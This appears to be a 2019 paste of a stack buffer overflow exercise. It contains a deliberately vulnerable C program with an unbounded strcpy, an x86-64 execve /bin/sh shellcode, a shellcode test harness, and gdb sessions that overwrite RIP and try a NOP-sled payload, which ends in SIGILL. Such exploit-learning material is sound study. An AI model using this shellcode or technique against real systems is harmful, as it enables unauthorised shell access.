
Untitled

a guest
Jun 19th, 2019
root@kali:/tmp# cat /proc/sys/kernel/randomize_va_space
0

GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
          0x0000000000000000 0x0000000000000000 RWE 0x10

root@kali:/tmp# file vuln2
vuln2: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=8102b60ffa8c26f231e4184d2f49b2e7c26a18b9, not stripped

root@kali:/tmp# lscpu | grep 'Byte Order'
Byte Order: Little Endian

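#include <stdio.h>
#include <string.h>   /* declares strcpy() */

int main(int argc, char *argv[]){
    char buf[512];
    /* Unbounded copy: an argv[1] longer than 511 bytes overflows buf (the bug under test) */
    strcpy(buf, argv[1]);
    return 0;
}
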
gcc -o vuln2 vuln2.c -fno-stack-protector -z execstack

\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05

#include <sys/mman.h>
#include <stdint.h>

/* Shellcode bytes under test */
char code[] = "\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05";

int main(){
    /* Mark the 4096-byte page that holds code[] readable and executable */
    mprotect((void *)((uint64_t)code & ~4095), 4096, PROT_READ|PROT_EXEC);
    /* Call code[] as a function taking no arguments */
    (*(void(*)()) code)();
    return 0;
}

(gdb) r $(python -c 'print "A"*526')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/vuln2 $(python -c 'print "A"*526')

Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
(gdb) x/x $rip
0x414141414141: Cannot access memory at address 0x414141414141

(gdb) x/100x $rsp
0x7fffffffdd60: 0xffffe058 0x00007fff 0xf7fd3298 0x00000002
0x7fffffffdd70: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdd80: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdd90: 0x41414141 0x41414141 0x41414141 0x41414141

(gdb) x/x $rbp
0x7fffffffdf70: 0x41414141

(gdb) r $(python -c 'print "\x90"*495+"\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05"+"\x90\xdd\xff\xff\xff\x7f"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/vuln2 $(python -c 'print "\x90"*495+"\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05"+"\x90\xdd\xff\xff\xff\x7f"')

Program received signal SIGILL, Illegal instruction.
0x00007fffffffdf73 in ?? ()